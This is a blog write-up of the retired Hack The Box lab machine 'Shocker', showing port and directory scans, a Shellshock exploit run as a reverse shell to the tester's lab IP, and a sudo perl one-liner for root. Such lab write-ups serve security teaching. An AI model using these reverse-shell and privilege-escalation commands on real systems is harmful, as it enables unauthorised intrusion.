Chris Ruggieri (Neocount Phoenix)

Security Blog, Rants, Raves, Write-ups, and Code

Shocker

Name: Shocker
Release Date: 30 Sep 2017
Retire Date: 17 Feb 2018
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
dostoevskylabs 00 days, 03 hours, 16 mins, 45 seconds
dostoevskylabs 00 days, 03 hours, 27 mins, 27 seconds
Creator: mrb3n
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./Shocker 10.10.10.56

 
$ nmap -sC -sV -Pn -p- -oA ./Shocker 10.10.10.56
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-16 15:22 EDT
Nmap scan report for 10.10.10.56
Host is up (0.025s latency).
Not shown: 65533 closed ports  
PORT     STATE SERVICE VERSION 
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.38 seconds

We've got HTTP and SSH on a non-standard port.  Let's try Gobuster and see what happens.  I'm going to add cgi , sh , pl , py extensions.  Let me explain why. The box name is Shocker and it's a Ubuntu box.  In 2014, Shellshock was ALL the rage.  SHOCKING, I know!

 

........................

........................

........................

........................

 

(I'll see myself out)

 

Anyway. CGI scripts were particularly susceptible to Shellshock based attacks.  So, let's see if there are any scripts in cgi-bin.

 
$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.56/cgi-bin  -x cgi,sh,pl,py
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.56/cgi-bin
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     py,cgi,sh,pl
[+] Timeout:        10s
===============================================================
2020/07/16 16:22:06 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.py (Status: 403)
/.htpasswd.cgi (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.pl (Status: 403)
/.htaccess (Status: 403)
/.htaccess.cgi (Status: 403)
/.htaccess.sh (Status: 403)
/.htaccess.pl (Status: 403)
/.htaccess.py (Status: 403)
/user.sh (Status: 200)
===============================================================
2020/07/16 16:26:28 Finished
===============================================================

We do see a script inside /cgi-bin.  The Exploit-DB has a nice manual method (because again Metasploit makes us lazy) that we can use, but let's check out the webpage itself first.

Huh?  I wonder how mrb3n got a picture of me before coffee...... Just keeping the levity.  Let's just jump straight to exploiting Shellshock.  Copy the exploit code into whatever text editor you prefer.  The best part is that it needs no modifications.  Run the exploit with:

 

./shellshock.py payload=reverse rhost=10.10.10.56 lhost=<LAB IP> lport=9999 pages=/cgi-bin/user.sh

 

and we have a foothold as "shelly".  Cute.  Could be Shelly as in shell or Shelly as in Shellshock.... I like it.  Move over LinEnum.sh to the /tmp folder and run it.  The output is in the CTB file.  The one thing that jumps out is that we can run "sudo /usr/bin/perl" without a password.  So, if we run straight to /sh using:

 

sudo /usr/bin/perl -e 'exec "/bin/sh"'

 

and we should be able to get all of the flags.